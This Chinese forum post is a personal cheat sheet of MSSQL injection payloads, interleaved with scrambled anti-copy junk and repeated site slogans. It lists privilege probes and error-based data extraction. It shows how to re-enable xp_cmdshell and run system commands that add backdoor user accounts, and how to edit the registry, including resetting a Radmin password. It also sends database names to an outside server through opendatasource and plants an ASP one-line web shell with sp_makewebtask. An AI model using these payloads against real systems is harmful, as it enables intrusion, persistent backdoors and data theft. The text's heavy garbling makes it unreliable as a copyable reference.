论坛积分策略 论坛VIP区开放申请 我爱电脑万人签名活动 原声大碟520欢迎你 广告位招租
发新话题
打印

[[ 其它 ]] 常用的一些注入命令,方便查询

常用的一些注入命令,方便查询

我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!
& D" H0 t% f7 _" X3 U5 ]& I! ?6 R. k我爱电脑技术社区--打造最好的电脑技术自学交流平台www.520diannao.com2 {  l# J# ^- P/ A
//看看是什么权限的
; p: N$ Q, W- q) ?1 n! C$ c, H1 S我爱电脑技术论坛and 1=(Select IS_MEMBER(’db_owner’)) www.520diannao.com0 B% q% l) C8 J& a
And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;-- www.520diannao.com# c: W7 ]4 k3 @. y5 K& s& }1 D
www.520diannao.com7 h. M; d) G: {
//检测是否有读取某数据库的权限 打造最好的电脑自学交流论坛2 s9 {0 N/ w& q4 g( R3 U7 z
and 1= (Select HAS_DBACCESS(’master’))
* ~( F' G1 Q5 J9 X6 _And char(124)%2BCast(HAS_DBACCESS(’master’) as varchar(1))%2Bchar(124)=1 --
8 H; w! a  z9 G' E1 e( G电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站, H2 G* i! {& d  b
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站2 E/ k- H) G& Q; }. i
数字类型
# L9 H7 |8 P5 l+ I) _and char(124)%2Buser%2Bchar(124)=0 我爱电脑技术论坛/ F5 N( ]3 o; s! L( X% ]
我爱电脑技术社区--打造最好的电脑技术自学交流平台& Y: U, S- m* J6 Z: b7 {
字符类型
/ ]; }% g( F  h# O& X. [9 y( }3 k  v我爱电脑技术论坛’ and char(124)%2Buser%2Bchar(124)=0 and ’’=’ 打造最好的电脑自学交流论坛7 w5 a& Q7 u% E3 n( _
我爱电脑技术论坛$ H2 L/ \6 O' ?3 ^! `3 i
搜索类型
8 z- z6 m+ q. U7 X- \7 |( y我爱电脑技术论坛’ and char(124)%2Buser%2Bchar(124)=0 and ’%’=’
% ^% T* w: a5 w$ G我爱电脑技术社区--打造最好的电脑技术自学交流平台
; s9 z1 N3 t* e" H# Y, O$ P4 i我爱电脑技术论坛爆用户名
; m  l+ o! A" g电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站and user>0
# }) D9 u9 r" |  q- Z. z  k$ r我爱电脑技术社区--打造最好的电脑技术自学交流平台’ and user>0 and ’’=’ 我爱电脑技术论坛& K! o. n- i" p) m0 a1 i

* X1 _9 Y1 c- k7 Q" W打造最好的电脑自学交流论坛检测是否为SA权限
4 [- I, {6 w2 ]% R" @9 z. Q" I打造最好的电脑自学交流论坛and 1=(select IS_SRVROLEMEMBER(’sysadmin’));-- 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站5 r% ~  k, ]& g4 p
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站9 h( r' k% V8 R+ P

! f' S; F- [/ b/ U5 R我爱电脑技术社区--打造最好的电脑技术自学交流平台检测是不是MSSQL数据库 www.520diannao.com& m- T3 K( Q: x/ x/ E7 W, q
and exists (select * from sysobjects);--  
9 f5 d2 s& h: ?; u4 a) H我爱电脑技术论坛
5 c1 G4 A7 w3 r* K我爱电脑技术论坛检测是否支持多行 www.520diannao.com$ t0 ?) v1 R1 X
;declare @d int;--  
. x5 j" @$ B9 f. Q我爱电脑技术论坛
6 T0 |4 F' t: M5 G: x& {电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站恢复 xp_cmdshell www.520diannao.com3 E9 m# Q) x# A1 H6 g# _
;exec master..dbo.sp_addextendedproc ’xp_cmdshell’,’xplog70.dll’;--
  }9 W6 l7 ^) P8 f我爱电脑技术社区--打造最好的电脑技术自学交流平台我爱电脑技术社区--打造最好的电脑技术自学交流平台' x* \0 b1 j) n% Z  A

1 @4 Q/ ]% h7 K, K) a( d电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站select * from openrowset(’sqloledb’,’server=192.168.1.200,1433;uid=test;pwd=pafpaf’,’select @@version’)  www.520diannao.com' e, N9 q( @( w% \6 ]1 N* s; j$ |  b7 L

! A% h5 m+ e2 I" p/ w电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站//----------------------- www.520diannao.com2 W/ E7 ]* y& T4 @$ t6 B/ ^2 z
//      执行命令
4 b6 J! _% t+ v# E# K: ]( _打造最好的电脑自学交流论坛//-----------------------
/ T; y. y2 n) v: k我爱电脑技术论坛首先开启沙盘模式:
6 S/ O6 M3 T; u1 m8 k& A电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
* r7 `+ B! O# e* iwww.520diannao.com
. t: U/ ^8 f1 R8 [2 V, _www.520diannao.com然后利用jet.oledb执行系统命令
. P) W) F: Z# K+ w0 c我爱电脑技术社区--打造最好的电脑技术自学交流平台select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=c:\winnt\system32\ias\ias.mdb’,’select shell("cmd.exe /c net user admin admin1234 /add")’) 我爱电脑技术论坛7 Y6 D2 w. W% I! {1 t* s. O+ P/ i$ N. [
我爱电脑技术社区--打造最好的电脑技术自学交流平台$ D2 y6 Q/ x! ~, z$ _
执行命令 4 H' _, D7 h2 x3 r7 g  A! O
;DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add’;-- 打造最好的电脑自学交流论坛1 [$ _9 D' C0 T. ^) a

, _# [) e1 e  m# Z! HEXEC [master].[dbo].[xp_cmdshell] ’cmd /c md c:\1111’ www.520diannao.com! `9 I, b3 `) c& [- ^6 E3 w

8 ~, Y+ U  p$ S8 C5 T5 o1 {& h我爱电脑技术论坛判断xp_cmdshell扩展存储过程是否存在:
2 B3 x% Z; b7 Mhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ’X’ AND name = ’xp_cmdshell’)
4 S' E0 F+ h" ^! ^* ~www.520diannao.com
$ ^# e, j8 z' B) }电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站写注册表 我爱电脑技术社区--打造最好的电脑技术自学交流平台2 d' s8 f$ S# G$ F6 Y
exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1 我爱电脑技术论坛$ n. x% R) Q' u; k' A

- d( \  D  j8 c( R' I& swww.520diannao.comREG_SZ
) n% W' _. g( z' x% Y( _6 G" w" f9 @www.520diannao.com电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站: n7 {/ k! H( f/ J3 a- b
读注册表 我爱电脑技术论坛0 c- z" t: j, T% J7 c
exec master..xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon’,’Userinit’ 我爱电脑技术社区--打造最好的电脑技术自学交流平台; Q- {3 C1 q* {% Y0 s4 ^

4 T/ d. ~# @3 ^# P0 @0 I  d打造最好的电脑自学交流论坛读取目录内容
. c' C, T1 P) d" X% k6 z% ~: @7 D3 S打造最好的电脑自学交流论坛exec master..xp_dirtree ’c:\winnt\system32\’,1,1 www.520diannao.com0 h2 E/ ^5 ?. b, f% ^* a

  ~2 s1 {% `& s8 a; p  V# B我爱电脑技术社区--打造最好的电脑技术自学交流平台
/ p% `8 G- I6 @/ u  h/ g我爱电脑技术社区--打造最好的电脑技术自学交流平台数据库备份
8 A# D* b/ I6 c+ S2 g( L1 C# G电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站backup database pubs to disk = ’c:\123.bak’
! V5 \' C) i. p4 I0 H4 v电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站我爱电脑技术社区--打造最好的电脑技术自学交流平台# @! }$ Q# X! |( [( F
//爆出长度 & A, `% y  n& F* v* \8 C& s
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
/ b/ t% B" ^) L) `0 e我爱电脑技术论坛
, a, L: E3 ?5 R4 o打造最好的电脑自学交流论坛8 {; M. [7 |$ w2 C- @3 r* Y& y
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站2 ~6 `- q  R1 d! F
更改sa口令方法:用sql综合利用工具连接后,执行命令:
3 P! l6 ^5 Z. L! k3 ~0 c' G9 E* F我爱电脑技术社区--打造最好的电脑技术自学交流平台exec sp_password NULL,’新密码’,’sa’
: g$ L. U- {% W' F, `0 L; A  ~打造最好的电脑自学交流论坛www.520diannao.com7 P5 y) O- S/ x' s2 M6 x
添加和删除一个SA权限的用户test: 打造最好的电脑自学交流论坛+ I: I' l1 a5 A1 G9 W! G/ @! t# R* }
exec master.dbo.sp_addlogin test,ptlove 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站' s# J( ^) d7 H/ y3 T# I* g/ b( J
exec master.dbo.sp_addsrvrolemember test,sysadmin
4 d4 g& T* B# D* N$ P9 p! [我爱电脑技术论坛我爱电脑技术社区--打造最好的电脑技术自学交流平台  V9 b- G& \0 v. f
删除扩展存储过过程xp_cmdshell的语句:  
9 r* u9 {# m- I* Iwww.520diannao.comexec sp_dropextendedproc ’xp_cmdshell’
( \) q) z# I: W: [; k/ S电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站打造最好的电脑自学交流论坛, C: N4 ~0 n9 k
添加扩展存储过过程
$ m6 W( a. z# k" ?& d8 U电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站EXEC [master]..sp_addextendedproc ’xp_proxiedadata’, ’c:\winnt\system32\sqllog.dll’  电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站' b3 W1 }, j8 W$ g: F* d. [
GRANT exec On xp_proxiedadata TO public  www.520diannao.com$ e, _8 @3 ~/ b. u

' S& K1 Z6 X: B# y; M( J" F电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站打造最好的电脑自学交流论坛" K1 O- c0 f+ g( P
停掉或激活某个服务。  电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站7 p6 u0 g' ?, ^$ p& K0 Q$ `1 w

8 x: r' |2 x/ nwww.520diannao.comexec master..xp_servicecontrol ’stop’,’schedule’
9 b1 B  X0 o: x! {" R打造最好的电脑自学交流论坛exec master..xp_servicecontrol ’start’,’schedule’ 打造最好的电脑自学交流论坛* H4 a; ]8 `2 ?; A

# F% q$ d  D  y2 t7 b' S电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站dbo.xp_subdirs 打造最好的电脑自学交流论坛) O# C/ g4 q' X7 c/ p
www.520diannao.com* H9 s4 |/ v# X5 r) f( u# \( v
只列某个目录下的子目录。 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站) N2 S6 |& d/ E# \5 O
xp_getfiledetails ’C:\Inetpub\wwwroot\SQLInject\login.asp’
# o5 g/ ^6 ~# Q- ]! R# }3 N: k- R
& x6 P( H4 A: Q我爱电脑技术论坛dbo.xp_makecab
0 u- r) \- d& n# I. \% q电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站www.520diannao.com4 q8 P5 y5 P, z0 W
将目标多个档案压缩到某个目标档案之内。
7 j4 F$ v9 b) a/ y) J打造最好的电脑自学交流论坛所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
% K# s2 F; T. {& ^# G我爱电脑技术社区--打造最好的电脑技术自学交流平台我爱电脑技术论坛9 g, Z& Q8 V; d) _9 M/ \. X
dbo.xp_makecab
9 P# K2 ]' C: x/ \: i我爱电脑技术论坛’c:\test.cab’,’mszip’,1, 我爱电脑技术论坛! c$ r9 X9 ?3 D# A" b3 c& ?' o+ I
’C:\Inetpub\wwwroot\SQLInject\login.asp’, 我爱电脑技术社区--打造最好的电脑技术自学交流平台$ k* }! J3 u3 }9 u8 `% c8 O& R
’C:\Inetpub\wwwroot\SQLInject\securelogin.asp’ 我爱电脑技术论坛0 j8 C! A7 s- R

& p+ F% \) D; c  d打造最好的电脑自学交流论坛xp_terminate_process
1 q" h# X* f5 Y! V: O9 [0 _电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站www.520diannao.com& f  l& Z, `; R/ c
停掉某个执行中的程序,但赋予的参数是 Process ID。 我爱电脑技术论坛2 p2 d% X8 v5 o) d5 r4 {5 ~
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
. E. N5 _1 f4 w0 K0 L! ywww.520diannao.com电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站, K( ~) T5 M6 B( r/ g. h& W
xp_terminate_process 2484 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站5 r! g2 A% K9 _5 l# N' }
打造最好的电脑自学交流论坛* b8 v% n" A; }6 l/ J+ _- H- `
xp_unpackcab
+ ~4 p: y0 ^( Z+ M, t打造最好的电脑自学交流论坛
+ q  b% }) c# O2 A; N8 q: Y/ @电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站解开压缩档。
# O/ ]4 U, [; C9 B3 n电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站9 z" T+ W4 E' c$ f" P0 g
xp_unpackcab ’c:\test.cab’,’c:\temp’,1
/ M- i* R% \: f# o4 F打造最好的电脑自学交流论坛我爱电脑技术论坛: v0 _3 C3 Z. D. E+ y

1 s3 F4 S$ o. A6 u# h我爱电脑技术论坛某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’Parameter’,’REG_BINARY’,0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’port’,’REG_BINARY’,0xd20400 则端口值改为1234 www.520diannao.com' R1 l' j( Z. O4 R! X0 ]( A7 ~3 }
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站/ Y# Z" W* }7 l
create database lcx;
# ?! x1 o# G% ~" D- [打造最好的电脑自学交流论坛Create TABLE ku(name nvarchar(256) null);
( S& ]7 ]* g7 _  Q) u+ K( x我爱电脑技术论坛Create TABLE biao(id int NULL,name nvarchar(256) null);
, N6 S$ `/ K' }我爱电脑技术社区--打造最好的电脑技术自学交流平台我爱电脑技术论坛4 o1 b& c2 y6 Z/ K* V# z, |& o
//得到数据库名
" p* b+ w' X2 p6 d  |www.520diannao.cominsert into opendatasource(’sqloledb’,’server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx’).lcx.dbo.ku select name from master.dbo.sysdatabases
3 O2 g' D  \1 U* `; Y2 u9 m我爱电脑技术论坛
$ o7 V" j- F2 E8 d$ o& b: `( S
! a2 Z8 v& j. e) S" k* |4 Q打造最好的电脑自学交流论坛//在Master中创建表,看看权限怎样 * z% \, k' q* H. ~
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);-- 我爱电脑技术论坛8 j7 Q$ ?! u7 w. E
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站. B$ U* X, \/ v
用 sp_makewebtask直接在web目录里写入一句话马: 我爱电脑技术论坛+ F# z  e6 {3 O2 t6 g* X
http://127.0.0.1/dblogin123.asp?username=123’;exec%20sp_makewebtask%20’d:\www\tt\88.asp’,’%20select%20’’<%25execute(request("a"))%25>’’%20’;--
& i( C) z( {6 V; H8 O7 S: D% f电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站我爱电脑技术社区--打造最好的电脑技术自学交流平台  e6 n5 r4 J; f4 e: F9 L
//更新表内容 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站0 P4 }4 n; K( W1 K* D
Update films SET kind = ’Dramatic’ Where id = 123 我爱电脑技术社区--打造最好的电脑技术自学交流平台2 b- G/ I8 b: k

# i+ @5 E, Y$ M我爱电脑技术社区--打造最好的电脑技术自学交流平台//删除内容 打造最好的电脑自学交流论坛% `# X- p* A, t1 T: F2 l
delete from table_name where Stockid = 3

TOP

发新话题